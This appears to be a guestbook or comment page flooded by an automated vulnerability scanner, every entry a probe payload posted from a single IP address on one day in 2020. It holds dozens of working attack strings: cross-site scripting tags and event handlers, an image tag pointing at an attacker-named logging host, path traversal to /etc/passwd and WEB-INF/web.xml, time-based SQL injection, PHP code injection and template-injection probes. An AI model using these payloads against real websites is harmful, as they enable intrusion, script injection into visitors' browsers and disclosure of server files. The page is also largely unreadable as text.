GRLpGpAG [116.113.93.82] 2020-10-28 18:27:44

[url=http://www.vulnweb.com][/url]

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:40

<a HrEF=jaVaScRiPT:>

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:34

<a HrEF=http://www.vulnweb.com></a>

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:31

1<input autofocus onfocus=iu0T(9765)>

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:27

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:25

1<ScRiPt>iu0T(9848)</sCripT>

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:22

1\u003CScRiPt\iu0T(9608)\u003C/sCripT\u003E

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:18

%31%3C%53%63%52%69%50%74%20%3E%69%75%30%54%289506%29%3C%2F%73%43%72%69%70%54%3E

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:16

1<img/src=">" onerror=alert(9814)>

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:12

1<img src=xyz OnErRor=iu0T(9246)>

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:09

1<img src=//testasp.vulnweb.com/t/dot.gif onload=iu0T(9339)>

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:06

1<body onload=iu0T(9011)>

GRLpGpAG [116.113.93.82] 2020-10-28 18:27:02

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9231'>

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:59

1<isindex type=image src=1 onerror=iu0T(9658)>

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:56

1<svg

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:54

1<video><source onerror="javascript:iu0T(9563)">

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:51

1<ScRiPt >iu0T(9341)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:48

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9871></ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:45

1<ScRiPt >iu0T(9616)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:40

1<ScR<ScRiPt>IpT>iu0T(9646)</sCr<ScRiPt>IpT>

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:37

1<script>iu0T(9694)</script>

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:35

1<W0O5PM>U7C6F[!+!]</W0O5PM>

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:32

1<ScRiPt >iu0T(9502)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:29

{{9999782*9999756}}

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:26

acux3124

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:24

acu2558<s1﹥s2ʺs3ʹuca2558

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:21

19501881

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:17

'"()&%<acx><ScRiPt >iu0T(9848)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 18:26:14

1'"()&%<acx><ScRiPt >iu0T(9921)</ScRiPt>

GRLpGpAG [116.113.93.82<rYkQRL<] 2020-10-28 18:26:07

1

GRLpGpAG [116.113.93.82<img sRc='http://attacker-9385/log.php?] 2020-10-28 18:26:05

1

GRLpGpAG [116.113.93.82<RTmVO2 x=9588>] 2020-10-28 18:26:01

1

GRLpGpAG [116.113.93.82<ifRAme sRc=9327.com></IfRamE>] 2020-10-28 18:25:57

1

GRLpGpAG [116.113.93.82<WGMQCD>UKRES[!+!]</WGMQCD>] 2020-10-28 18:25:54

1

GRLpGpAG [116.113.93.82VsM5O <ScRiPt >iu0T(9910)</ScRiPt>] 2020-10-28 18:25:51

1

GRLpGpAG [116.113.93.82<% contenteditable onresize=iu0T(9251)>] 2020-10-28 18:25:42

1

GRLpGpAG [116.113.93.82}body{acu:Expre/**/SSion(iu0T(9950))}] 2020-10-28 18:25:36

1

GRLpGpAG [116.113.93.82<img<!-- --> src=x onerror=alert(9521);//><!-- -->] 2020-10-28 18:25:33

1

GRLpGpAG [[url=http://www.vulnweb.com][/url]] 2020-10-28 18:25:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:25

1

GRLpGpAG [<a HrEF=jaVaScRiPT:>] 2020-10-28 18:25:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:22

1

GRLpGpAG [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 18:25:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:20

1

GRLpGpAG [116.113.93.82<input autofocus onfocus=iu0T(9025)>] 2020-10-28 18:25:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:16

1

GRLpGpAG [] 2020-10-28 18:25:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:14

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:14

1

GRLpGpAG [116.113.93.82<ScRiPt>iu0T(9259)</sCripT>] 2020-10-28 18:25:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:10

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:06

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:06

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:05

1

GRLpGpAG [116.113.93.82\u003CScRiPt\iu0T(9490)\u003C/sCripT\u003E] 2020-10-28 18:25:05

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:05

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:03

1

GRLpGpAG [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%69%75%30%54%289162%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 18:25:02

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:02

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:01

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:00

1

GRLpGpAG [116.113.93.82<img/src=">" onerror=alert(9512)>] 2020-10-28 18:25:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:25:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:58

1

GRLpGpAG [116.113.93.82<img src=xyz OnErRor=iu0T(9200)>] 2020-10-28 18:24:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:56

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:55

1

GRLpGpAG [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=iu0T(9817)>] 2020-10-28 18:24:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:54

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:50

1

GRLpGpAG [116.113.93.82<body onload=iu0T(9524)>] 2020-10-28 18:24:47

1

GRLpGpAG [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9193'>] 2020-10-28 18:24:37

1

GRLpGpAG [116.113.93.82<isindex type=image src=1 onerror=iu0T(9792)>] 2020-10-28 18:24:35

1

GRLpGpAG [116.113.93.82<svg ] 2020-10-28 18:24:32

1

WEB-INF\web.xml [116.113.93.82] 2020-10-28 18:24:26

1

GRLpGpAG [116.113.93.82<video><source onerror="javascript:iu0T(9936)">] 2020-10-28 18:24:26

1

WEB-INF/web.xml [116.113.93.82] 2020-10-28 18:24:25

1

/WEB-INF/web.xml [116.113.93.82] 2020-10-28 18:24:25

1

GRLpGpAG [116.113.93.82<ScRiPt >iu0T(9057)</ScRiPt>] 2020-10-28 18:24:23

1

/\../\../\../\../\../\../\../etc/passwd [116.113.93.82] 2020-10-28 18:24:23

1

file:///etc/passwd [116.113.93.82] 2020-10-28 18:24:22

1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ [116.113.93.82] 2020-10-28 18:24:21

1

GRLpGpAG [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9837></ScRiPt>] 2020-10-28 18:24:20

1

.. [116.113.93.82] 2020-10-28 18:24:20

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd [116.113.93.82] 2020-10-28 18:24:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:19

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd [116.113.93.82] 2020-10-28 18:24:18

1

GRLpGpAG [116.113.93.82<ScRiPt >iu0T(9511)</ScRiPt>] 2020-10-28 18:24:17

1

/.././.././.././.././.././.././.././../etc/./passwd%00 [116.113.93.82] 2020-10-28 18:24:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:17

1

%2fetc%2fpasswd [116.113.93.82] 2020-10-28 18:24:16

1

YSjZLOo2'));select pg_sleep(6); -- [116.113.93.82] 2020-10-28 18:24:16

1

/etc/passwd [116.113.93.82] 2020-10-28 18:24:16

1

qNcY63Jd');select pg_sleep(3); -- [116.113.93.82] 2020-10-28 18:24:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:15

1

GRLpGpAG [116.113.93.82<ScR<ScRiPt>IpT>iu0T(9953)</sCr<ScRiPt>IpT>] 2020-10-28 18:24:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:14

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd [116.113.93.82] 2020-10-28 18:24:14

1

R5lrF70a';select pg_sleep(3); -- [116.113.93.82] 2020-10-28 18:24:14

1

nZWRTbW9'; waitfor delay '0:0:3' -- [116.113.93.82] 2020-10-28 18:24:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:12

1

1 waitfor delay '0:0:3' -- [116.113.93.82] 2020-10-28 18:24:12

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:11

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ [116.113.93.82] 2020-10-28 18:24:10

1

GRLpGpAG [116.113.93.82<script>iu0T(9815)</script>] 2020-10-28 18:24:10

1

/../..//../..//../..//../..//../..//etc/passwd.jpg [116.113.93.82] 2020-10-28 18:24:09

1

0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z [116.113.93.82] 2020-10-28 18:24:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:08

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg [116.113.93.82] 2020-10-28 18:24:08

1

0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z [116.113.93.82] 2020-10-28 18:24:08

1

if(now()=sysdate(),sleep(9),0) [116.113.93.82] 2020-10-28 18:24:07

1

-1" OR 2+224-224-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 18:24:05

1

../../../../../../../../../../etc/passwd.jpg [116.113.93.82] 2020-10-28 18:24:05

1

-1' OR 2+623-623-1=0+0+0+1 or 'Vw4KIxqB'=' [116.113.93.82] 2020-10-28 18:24:05

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [116.113.93.82] 2020-10-28 18:24:04

1

-1' OR 2+147-147-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 18:24:03

1

../../../../../../../../../../../../../../../proc/version [116.113.93.82] 2020-10-28 18:24:03

1

-1 OR 2+615-615-1=0+0+0+1 [116.113.93.82] 2020-10-28 18:24:02

1

../../../../../../../../../../etc/passwd [116.113.93.82] 2020-10-28 18:24:02

1

GRLpGpAG [116.113.93.82<WRPLX7>JPP1Q[!+!]</WRPLX7>] 2020-10-28 18:24:01

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:00

WEB-INF\web.xml

GRLpGpAG [116.113.93.82] 2020-10-28 18:24:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:59

WEB-INF/web.xml

-1 OR 2+761-761-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 18:23:58

1

GRLpGpAG [116.113.93.82<ScRiPt >iu0T(9510)</ScRiPt>] 2020-10-28 18:23:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:58

/WEB-INF/web.xml

iCodQV2R [116.113.93.82] 2020-10-28 18:23:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:57

/\../\../\../\../\../\../\../etc/passwd

GRLpGpAG [{{10000125*9999721}}] 2020-10-28 18:23:56

1

[116.113.93.82] 2020-10-28 18:23:56

1

[116.113.93.82] 2020-10-28 18:23:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:55

file:///etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:54

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

JyI= [116.113.93.82] 2020-10-28 18:23:54

1

GRLpGpAG [acux9725] 2020-10-28 18:23:54

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:54

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:53

..

@@POwLN [116.113.93.82] 2020-10-28 18:23:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:53

Muj6REKD'));select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:52

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1 [116.113.93.82] 2020-10-28 18:23:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:52

eLXsvdTI');select pg_sleep(6); --

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:51

1

\ [116.113.93.82] 2020-10-28 18:23:51

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:50

1

1'" [116.113.93.82] 2020-10-28 18:23:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:49

TL0twP9q';select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:49

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:49

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:49

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:48

-1));select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:48

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:47

-1);select pg_sleep(3); --

GRLpGpAG [acu2624<s1﹥s2ʺs3ʹuca2624] 2020-10-28 18:23:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:47

/.././.././.././.././.././.././.././../etc/./passwd%00

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:46

-1;select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:46

<!-- [116.113.93.82] 2020-10-28 18:23:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:46

%2fetc%2fpasswd

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:46

yUdFyjfg'; waitfor delay '0:0:9' --

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:45

JyI=

'" [116.113.93.82] 2020-10-28 18:23:45

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:45

1 waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:44

/etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:44

@@KnwHi

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:44

-1); waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:44

<!--

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:43

1

GRLpGpAG [116.113.93.829690357] 2020-10-28 18:23:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:43

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:43

-1; waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:42

/../..//../..//../..//../..//../..//etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:42

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

/www.vulnweb.com [116.113.93.82] 2020-10-28 18:23:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:41

'"

GRLpGpAG ['"()&%<acx><ScRiPt >iu0T(9530)</ScRiPt>] 2020-10-28 18:23:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:41

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:41

\

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:41

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:40

../../../../../../../../../../etc/passwd.jpg

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) [116.113.93.82] 2020-10-28 18:23:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:40

/www.vulnweb.com

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:40

1'"

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:39

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z

create/. [116.113.93.82] 2020-10-28 18:23:39

1

${@print(md5(acunetix_wvs_security_test))}\ [116.113.93.82] 2020-10-28 18:23:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:39

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:39

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

create [116.113.93.82] 2020-10-28 18:23:38

1

GRLpGpAG [<!--] 2020-10-28 18:23:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:38

../../../../../../../../../../../../../../../proc/version

GRLpGpAG [116.113.93.82'"()&%<acx><ScRiPt >iu0T(9188)</ScRiPt>] 2020-10-28 18:23:38

1

create [116.113.93.82] 2020-10-28 18:23:37

1

GRLpGpAG ['"] 2020-10-28 18:23:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:37

if(now()=sysdate(),sleep(9),0)

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:37

1

${@print(md5(acunetix_wvs_security_test))} [116.113.93.82] 2020-10-28 18:23:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:37

../../../../../../../../../../etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:36

create/.

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:36

-1" OR 2+116-116-1=0+0+0+1 --

";print(md5(acunetix_wvs_security_test));$a=" [116.113.93.82] 2020-10-28 18:23:36

1

GRLpGpAG [/www.vulnweb.com] 2020-10-28 18:23:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:35

-1' OR 2+35-35-1=0+0+0+1 or 'flS0pzXY'='

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:35

1

';print(md5(acunetix_wvs_security_test));$a=' [116.113.93.82] 2020-10-28 18:23:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:35

create

GRLpGpAG [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 18:23:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:34

-1' OR 2+821-821-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:34

create

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:33

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:33

-1 OR 2+403-403-1=0+0+0+1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:33

1

testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 18:23:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:32

-1 OR 2+191-191-1=0+0+0+1 --

;print(md5(acunetix_wvs_security_test)); [116.113.93.82] 2020-10-28 18:23:32

1

HttP://testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 18:23:31

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:31

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:31

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:30

PTgNSRrw

GRLpGpAG [] 2020-10-28 18:23:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:30

testasp.vulnweb.com/t/xss.html?%00

GRLpGpAG [] 2020-10-28 18:23:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:29

${@print(md5(acunetix_wvs_security_test))}\

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:29

HttP://testasp.vulnweb.com/t/xss.html?%00

http://hitDIqg5TBni6.bxss.me/ [116.113.93.82] 2020-10-28 18:23:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:28

${@print(md5(acunetix_wvs_security_test))}

GRLpGpAG [JyI=] 2020-10-28 18:23:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:27

http://hitJEFfumnvbt.bxss.me/

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:27

";print(md5(acunetix_wvs_security_test));$a="

GRLpGpAG [@@VDM5x] 2020-10-28 18:23:27

1

GRLpGpAG [create/.] 2020-10-28 18:23:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:26

';print(md5(acunetix_wvs_security_test));$a='

GRLpGpAG [1] 2020-10-28 18:23:26

1

^(#$!@#$)(()))****** [116.113.93.82] 2020-10-28 18:23:26

1

GRLpGpAG [create] 2020-10-28 18:23:26

1

GRLpGpAG [\] 2020-10-28 18:23:25

1

!(()&&!|*|*| [116.113.93.82] 2020-10-28 18:23:25

1

) [116.113.93.82] 2020-10-28 18:23:24

1

GRLpGpAG [1'"] 2020-10-28 18:23:24

1

GRLpGpAG [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 18:23:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:24

;print(md5(acunetix_wvs_security_test));

GRLpGpAG [create] 2020-10-28 18:23:24

1

GRLpGpAG [http://hitEJfFRHb3eZ.bxss.me/] 2020-10-28 18:23:23

1

testasp.vulnweb.com [116.113.93.82] 2020-10-28 18:23:23

1

GRLpGpAG [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 18:23:23

1

http://testasp.vulnweb.com/t/fit.txt?.jpg [116.113.93.82] 2020-10-28 18:23:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:21

1

Http://testasp.vulnweb.com/t/fit.txt [116.113.93.82] 2020-10-28 18:23:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:21

^(#$!@#$)(()))******

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:20

!(()&&!|*|*|

1some_inexistent_file_with_long_name.jpg [116.113.93.82] 2020-10-28 18:23:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:19

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg [116.113.93.82] 2020-10-28 18:23:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:17

testasp.vulnweb.com

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:17

)

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 18:23:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:16

http://testasp.vulnweb.com/t/fit.txt?.jpg

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 18:23:16

1

GRLpGpAG&n983345=v937734 [116.113.93.82] 2020-10-28 18:23:16

1

'"() [116.113.93.82] 2020-10-28 18:23:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:16

Http://testasp.vulnweb.com/t/fit.txt

GRLpGpAG [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 18:23:15

1

Array [116.113.93.82] 2020-10-28 18:23:15

1

GRLpGpAG [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 18:23:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:15

1some_inexistent_file_with_long_name.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:14

'"()

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:13

1&n906949=v956893

GRLpGpAG [;print(md5(acunetix_wvs_security_test));] 2020-10-28 18:23:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:13

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

GRLpGpAG [WEB-INF\web.xml] 2020-10-28 18:23:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:13

Array

GRLpGpAG [WEB-INF/web.xml] 2020-10-28 18:23:11

1

Array [116.113.93.82] 2020-10-28 18:23:11

1

Array [116.113.93.82] 2020-10-28 18:23:10

1

GRLpGpAG [^(#$!@#$)(()))******] 2020-10-28 18:23:10

1

GRLpGpAG [/WEB-INF/web.xml] 2020-10-28 18:23:09

1

GRLpGpAG [!(()&&!|*|*|] 2020-10-28 18:23:09

1

GRLpGpAG ['"()] 2020-10-28 18:23:08

1

